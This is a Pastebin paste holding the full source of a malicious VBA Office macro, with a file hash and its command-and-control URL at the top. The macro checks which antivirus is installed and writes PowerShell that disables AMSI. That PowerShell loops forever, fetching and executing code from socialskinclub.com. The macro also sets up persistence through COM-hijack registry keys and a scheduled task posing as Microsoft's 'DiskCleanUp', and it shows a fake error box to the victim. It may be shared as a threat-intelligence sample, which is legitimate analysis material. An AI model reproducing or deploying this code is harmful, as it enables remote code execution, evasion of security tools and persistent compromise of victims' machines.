Advertisement
TrashScrape

aca9e602caefd598a3c5991d68937bc1624cdc8f1d602f8bc0a3b9c0078a1d28

May 1st, 2022
1,466
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. aca9e602caefd598a3c5991d68937bc1624cdc8f1d602f8bc0a3b9c0078a1d28
  2. https://socialskinclub.com/'+$Julyb
  3.  
  4.  
  5.  
  6.  
  7. Sub O5P7R5()
  8.  
  9.     Juliai = ""
  10.     Set factoriesy = GetObject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  11.     Lyonsz = "securitycenter2"
  12.  
  13.     Set ministersi = GetObject("winmgmts:\\localhost\root\" & Lyonsz)
  14.     Set soldiersc = ministersi.execquery("select * from antivirusproduct", "wql", 0)
  15.  
  16.     For Each startedl In soldiersc
  17.         Juliai = Juliai & startedl.DisplayName & " ."
  18.     Next
  19.  
  20.     Set stoopx = CreateObject("Scripting.FileSystemObject")
  21.  
  22.     Set sorrowm = stoopx.CreateTextFile("C:\ProgramData\righteousy.txt")
  23.         If InStr(Juliai, "Norton") = False Then
  24.             sorrowm.Write "try{Remove-Module -Name PSReadline -Force}catch{};$breezew = 'Sys';$breezew += 'tem.Ma';$breezew += 'nagement.Au';$breezew += 'tom';$breezew += 'ation.';$breezew += 'A';$breezew += 'm';$contemplationv = 's';$contemplationv += 'i';$contemplationv += 'Ut';$contemplationv += 'ils';$Herer = 'In';$songsi = 'itF';$uselessd = 'ailed';$downstairsh = 'am';$downstairsh += 's';$downstairsh += 'i' ;$describedu = $downstairsh + $Herer + $songsi + $uselessd ;$tix = $null;$linksk = $true;$Foundationl = [Ref].Assembly.GetType($breezew + $contemplationv).GetField($describedu,'NonPublic,Static');$Foundationl.SetValue($tix, $linksk);"
  25.         End If
  26.         sorrowm.Write "function gatheringp($Julyb){$newsletterw = [Net.WebRequest]::Create('https://socialskinclub.com/'+$Julyb);$newsletterw.Method='GET';$newsletterw.UserAgent='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:PLO_47) Gecko/32.28.31.47 Firefox/2.0';$newsletterw.Accept='text/html,application/json;q=0.9,*/*;q=0.8';$newsletterw.ContentLength=0;$passe=$newsletterw.GetResponse();$global:status=[int]$passe.StatusCode;$cigarp=$passe.GetResponseStream();$cigarpReader=new-object System.IO.StreamReader $cigarp;$beloww=$cigarpReader.ReadToEnd();$cigarpReader.Close();$passe.Close();return $beloww}while($true){$partiald=gatheringp('');if ($global:status -eq 200 -and -not [string]::IsNullOrEmpty($partiald)){$partiald=$partiald.ToString().Substring($partiald.IndexOf('<p>')+3, $partiald.LastIndexOf('</p>')-$partiald.IndexOf('<p>')-3);iex($partiald)}Get-Random -Minimum 60 -Maximum 100 | start-sleep}"
  27.     sorrowm.Close
  28.     touchl = InStr(Juliai, "Avast") Or InStr(Juliai, "AVG") Or InStr(Juliai, "360")
  29.     If touchl Then
  30.         sondernb = 1
  31.         cataloguek = "C:\ProgramData\prncnfg.txt"
  32.     Else
  33.         sondernb = False
  34.         cataloguek = "C:\ProgramData\prncnfg.v"
  35.         cataloguek = cataloguek & Chr(98)
  36.         cataloguek = cataloguek & "s"
  37.     End If
  38.  
  39.     Set Italiansz = stoopx.CreateTextFile(cataloguek)
  40.         Italiansz.Write "CreateObject(""Shell.Application"").ShellExecute "
  41.         Italiansz.Write """p"
  42.         Italiansz.Write "o"
  43.         Italiansz.Write "w"
  44.         Italiansz.Write "e"
  45.         Italiansz.Write "r"
  46.         Italiansz.Write "s"
  47.         Italiansz.Write "h"
  48.         Italiansz.Write "e"
  49.         Italiansz.Write "l"
  50.         Italiansz.Write "l"","
  51.         Italiansz.Write """-C "" & (CreateObject(""Scripting.FileSystemObject"").OpenTextFile(""C:\ProgramData\righteousy.txt"").ReadAll),,, 0"
  52.     Italiansz.Close
  53.  
  54.     If sondernb Then
  55.         cataloguek = "//B //E:v" & Chr(98) & "s" & "cript " & cataloguek
  56.     Else
  57.         cataloguek = "//B " & cataloguek
  58.     End If
  59.  
  60.     destroyd = touchl Or InStr(Juliai, "F-Secure") Or InStr(Juliai, "BitDefender")
  61.     If destroyd = False Then
  62.         temp = CreateObject("Wscript.Shell").ExpandEnvironmentStrings("%temp%")
  63.         If Juliai = "Windows Defender ." Then
  64.             Set Italiansz = stoopx.CreateTextFile(temp & "\gatherNetworkInfo.v" & Chr(98) & "s")
  65.             Italiansz.Write "CreateObject(""Wscript.Shell"").RegWrite ""HKCU\Software\Classes\WbemScripting.SWbemLocator\CLSID\"", ""{451e01eb-660e-4dbb-b371-d29b3203725d}"", ""REG_SZ"":CreateObject(""Wscript.Shell"").RegWrite ""HKCU\Software\Classes\CLSID\{451e01eb-660e-4dbb-b371-d29b3203725d}\LocalServer32\"", ""wscript.exe " & cataloguek & """, ""REG_SZ"""
  66.             Italiansz.Close
  67.             waitTill = Now() + TimeValue("00:00:01")
  68.             While Now() < waitTill
  69.                 DoEvents
  70.             Wend
  71.             CreateObject("Shell.Application").ShellExecute "explorer.exe", temp & "\gatherNetworkInfo.v" & Chr(98) & "s", , , 0
  72.             waitTill = Now() + TimeValue("00:00:01")
  73.             While Now() < waitTill
  74.                 DoEvents
  75.             Wend
  76.             On Error Resume Next
  77.             CreateObject("Shell.Application").ShellExecute "cscript.exe", "C:\windows\System32\Printing_Admin_Scripts\en-US\prnport.v" & Chr(98) & "s" & " -g", , , 0
  78.             MsgBox "Something went wrong!" & vbCrLf & "Kindly contact the sender to send you the file again.", vbCritical, "Error"
  79.             Exit Sub
  80.         End If
  81.         Set Italiansz = stoopx.CreateTextFile(temp & "\gatherNetworkInfo.v" & Chr(98) & "s")
  82.         Italiansz.Write "CreateObject(""Wscript.Shell"").RegWrite ""HKCU\Software\Classes\CLSID\{00021400-0000-0000-C000-000000000046}\shell\open\command\"", ""wscript.exe "" & """ & cataloguek & """, ""REG_SZ"":CreateObject(""Shell.Application"").ShellExecute ""shell:Desktop"",,,, 0"
  83.         Italiansz.Close
  84.         waitTill = Now() + TimeValue("00:00:01")
  85.         While Now() < waitTill
  86.             DoEvents
  87.         Wend
  88.         CreateObject("Shell.Application").ShellExecute "explorer.exe", temp & "\gatherNetworkInfo.v" & Chr(98) & "s", , , 0
  89.         MsgBox "Something went wrong!" & vbCrLf & "Kindly contact the sender to send you the file again.", vbCritical, "Error"
  90.         Exit Sub
  91.     End If
  92.     Set quellev = CreateObject("Schedule.Service")
  93.     Call quellev.Connect
  94.  
  95.     Set easyv = quellev.NewTask(0)
  96.  
  97.     Set accordingx = easyv.RegistrationInfo
  98.     accordingx.Description = "Maintenance task used by the system to launch a silent auto disk cleanup when running low on free disk space."
  99.     accordingx.Author = "Microsoft Corporation"
  100.     accordingx.Version = 1
  101.     accordingx.Source = "Microsoft Windows"
  102.     accordingx.URI = "DiskCleanUp"
  103.  
  104.     Set boardd = easyv.Settings
  105.     boardd.Enabled = True
  106.     boardd.DisallowStartIfOnBatteries = False
  107.     boardd.StopIfGoingOnBatteries = False
  108.     boardd.StartWhenAvailable = True
  109.     boardd.MultipleInstances = 3
  110.     boardd.AllowHardTerminate = False
  111.     boardd.ExecutionTimeLimit = "PT0S"
  112.  
  113.     Set rowm = easyv.triggers
  114.     Set hoj = rowm.Create(7)
  115.  
  116.     Set precisiond = easyv.Actions.Create(0)
  117.     precisiond.Path = "wscript.exe"
  118.     precisiond.Arguments = cataloguek
  119.  
  120.     Call quellev.GetFolder("\").RegisterTaskDefinition("DiskCleanUp", easyv, 6, , , 0)
  121.     MsgBox "Something went wrong!" & vbCrLf & "Kindly contact the sender to send you the file again.", vbCritical, "Error"
  122. End Sub
  123.  
  124.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement